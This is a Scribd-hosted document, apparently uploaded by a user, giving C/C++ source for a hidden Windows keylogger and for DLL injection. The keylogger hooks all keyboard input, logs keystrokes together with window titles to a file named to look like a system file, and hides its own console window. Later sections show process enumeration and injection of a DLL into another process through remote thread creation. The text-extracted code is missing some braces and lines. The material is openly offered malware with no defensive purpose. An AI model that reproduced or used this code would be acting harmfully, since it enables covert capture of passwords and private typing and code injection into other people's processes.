Scribd
Upload
133 views9 pages

KeyLogger & DLL Injection Code

This document contains code for a keylogger that uses a Windows API hook to log keystrokes to a file. It sets a low-level keyboard hook to capture key presses, identifies the active window, and saves the keystroke along with the window name and timestamp to a log file. It also includes code snippets for making the keylogger a DLL, getting process IDs, and injecting the DLL into another process using remote thread creation.

Uploaded by

lt_shak875
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
133 views9 pages

KeyLogger & DLL Injection Code

This document contains code for a keylogger that uses a Windows API hook to log keystrokes to a file. It sets a low-level keyboard hook to capture key presses, identifies the active window, and saves the keystroke along with the window name and timestamp to a log file. It also includes code snippets for making the keylogger a DLL, getting process IDs, and injecting the DLL into another process using remote thread creation.

Uploaded by

lt_shak875
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 9

KeyLogger code

#include <Windows.h>

#include <time.h>

#include <iostream>

#include <cstdio>

// defines whether the window is visible or not

// should be solved with makefile, not in this file

#define invisible // (visible / invisible)

// variable to store the HANDLE to the hook. Don't declare it anywhere else then globally

// or you will get problems since every function uses this variable.

HHOOK _hook;

// This struct contains the data received by the hook callback. As you see in the callback function

// it contains the thing you will need: vkCode = virtual key code.

KBDLLHOOKSTRUCT kbdStruct;

int Save(int key_stroke, char *file);

extern char lastwindow[256];

// This is the callback function. Consider it the event that is raised when, in this case,

// a key is pressed.

LRESULT __stdcall HookCallback(int nCode, WPARAM wParam, LPARAM lParam)

if (nCode >= 0)

{
// the action is valid: HC_ACTION.

if (wParam == WM_KEYDOWN)

// lParam is the pointer to the struct containing the data needed, so cast and
assign it to kdbStruct.

kbdStruct = *((KBDLLHOOKSTRUCT*)lParam);

// save to file

Save(kbdStruct.vkCode, "C:\\System32Log.txt");

// call the next hook in the hook chain. This is nessecary or your hook chain will break and the
hook stops

return CallNextHookEx(_hook, nCode, wParam, lParam);

void SetHook()

// Set the hook and set it to use the callback function above

// WH_KEYBOARD_LL means it will set a low level keyboard hook. More information about it at
MSDN.

// The last 2 parameters are NULL, 0 because the callback function is in the same thread and
window as the

// function that sets and releases the hook.

if (!(_hook = SetWindowsHookEx(WH_KEYBOARD_LL, HookCallback, NULL, 0)))

MessageBox(NULL, "Failed to install hook!", "Error", MB_ICONERROR);

}
void ReleaseHook()

UnhookWindowsHookEx(_hook);
}

int Save(int key_stroke, char *file)

char lastwindow[256];

if ((key_stroke == 1) || (key_stroke == 2))

return 0; // ignore mouse clicks

FILE *OUTPUT_FILE;

OUTPUT_FILE = fopen(file, "a+");

HWND foreground = GetForegroundWindow();

if (foreground)

char window_title[256];

GetWindowText(foreground, window_title, 256);

if(strcmp(window_title, lastwindow)!=0) {

strcpy(lastwindow, window_title);

// get time
time_t t = time(NULL);

struct tm *tm = localtime(&t);

char s[64];

strftime(s, sizeof(s), "%c", tm);

fprintf(OUTPUT_FILE, "\n\n[Window: %s - at %s] ", window_title, s);

std::cout << key_stroke << '\n';

if (key_stroke == VK_BACK)

fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");

else if (key_stroke == VK_RETURN)

fprintf(OUTPUT_FILE, "%s", "\n");

else if (key_stroke == VK_SPACE)

fprintf(OUTPUT_FILE, "%s", " ");

else if (key_stroke == VK_TAB)

fprintf(OUTPUT_FILE, "%s", "[TAB]");

else if (key_stroke == VK_SHIFT || key_stroke == VK_LSHIFT || key_stroke == VK_RSHIFT)

fprintf(OUTPUT_FILE, "%s", "[SHIFT]");

else if (key_stroke == VK_CONTROL || key_stroke == VK_LCONTROL || key_stroke ==


VK_RCONTROL)

fprintf(OUTPUT_FILE, "%s", "[CONTROL]");

else if (key_stroke == VK_ESCAPE)

fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");

else if (key_stroke == VK_END)

fprintf(OUTPUT_FILE, "%s", "[END]");


else if (key_stroke == VK_HOME)

fprintf(OUTPUT_FILE, "%s", "[HOME]");

else if (key_stroke == VK_LEFT)

fprintf(OUTPUT_FILE, "%s", "[LEFT]");

else if (key_stroke == VK_UP)

fprintf(OUTPUT_FILE, "%s", "[UP]");

else if (key_stroke == VK_RIGHT)

fprintf(OUTPUT_FILE, "%s", "[RIGHT]");

else if (key_stroke == VK_DOWN)

fprintf(OUTPUT_FILE, "%s", "[DOWN]");

else if (key_stroke == 190 || key_stroke == 110)

fprintf(OUTPUT_FILE, "%s", ".");

else if (key_stroke == 189 || key_stroke == 109)

fprintf(OUTPUT_FILE, "%s", "-");

else if (key_stroke == 20)

fprintf(OUTPUT_FILE, "%s", "[CAPSLOCK]");

else {

if (key_stroke >= 96 && key_stroke <= 105)

key_stroke -= 48;

else if (key_stroke >= 65 && key_stroke <= 90) { // A-Z

// check caps lock

bool lowercase = ((GetKeyState(VK_CAPITAL) & 0x0001) != 0);

// check shift key

if ((GetKeyState(VK_SHIFT) & 0x0001) != 0 || (GetKeyState(VK_LSHIFT) &


0x0001) != 0 || (GetKeyState(VK_RSHIFT) & 0x0001) != 0) {
lowercase = !lowercase;

if (lowercase) key_stroke += 32;

fprintf(OUTPUT_FILE, "%c", key_stroke);

// NOTE: Numpad-Keys seem to print as lowercase letters

fclose(OUTPUT_FILE);

return 0;

void Stealth()

#ifdef visible

ShowWindow(FindWindowA("ConsoleWindowClass", NULL), 1); // visible window

#endif // visible

#ifdef invisible

ShowWindow(FindWindowA("ConsoleWindowClass", NULL), 0); // invisible window

#endif // invisible

int main()

// visibility of window

Stealth();
// Set the hook

SetHook();

// loop to keep the console application running.

MSG msg;

while (GetMessage(&msg, NULL, 0, 0))

Making a DLL
#include <windows.h>

#define BUILD_DLL

#ifdef BUILD_DLL

#define DLL_EXPORT __declspec(dllexport)

#else

#define DLL_IMPORT __declspec(dllimport)

#endif

extern "C" DLL_EXPORT BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID
lpvReserved)

switch (fdwReason)

case DLL_PROCESS_ATTACH:

MessageBox(NULL,TEXT("I'm injected ... W00T !!! =D"),TEXT("LOL"),MB_OK);

break;

case DLL_PROCESS_DETACH:

break;
case DLL_THREAD_ATTACH:

break;

case DLL_THREAD_DETACH:

break;

return TRUE;

Get processes and their PIDs


void Parse_Processes(void)

PROCESSENTRY32 myProcInf = {sizeof(PROCESSENTRY32)};

HANDLE mySnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

if(mySnapShot == INVALID_HANDLE_VALUE)

printf("[!] Error: Invalid SnapShot.\n");

exit(-1);

if(!Process32First(mySnapShot,&myProcInf))

CloseHandle(mySnapShot);

exit(-1);

do

{
printf("%50s%5s:%5s%ld\n", myProcInf.szExeFile,"","",myProcInf.th32ProcessID);

}while(Process32Next(mySnapShot,&myProcInf));

DLL Injection
Make a handle
Handle ProcHandler = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, ProcID);

// ProcID is process ID

Allocate memory in target process


DllAllocatedAddress = VirtualAllocEx(ProcHandler,NULL,strlen(DllAbsPath),
MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);

//Path of DLL DllAbsPath

Writing DLL into allocated memory space


WriteProcessMemory(ProcHandler,DllAllocatedAddress,DllAbsPath,strlen(DllAbsPath),NULL)

Load LibraryA (kernel32) Address


LoadLibAddress = GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")),"LoadLibraryA");

Locate starting point of LibA


MyStartExecutionAddress = (LPTHREAD_START_ROUTINE) LoadLibAddress;

Create a thread
threadHandler =
CreateRemoteThread(ProcHandler,NULL,0,MyStartExecutionAddress,DllAllocatedAddress,0,NULL);

//If thread is created for ProcHandler, it means injection is successful

You might also like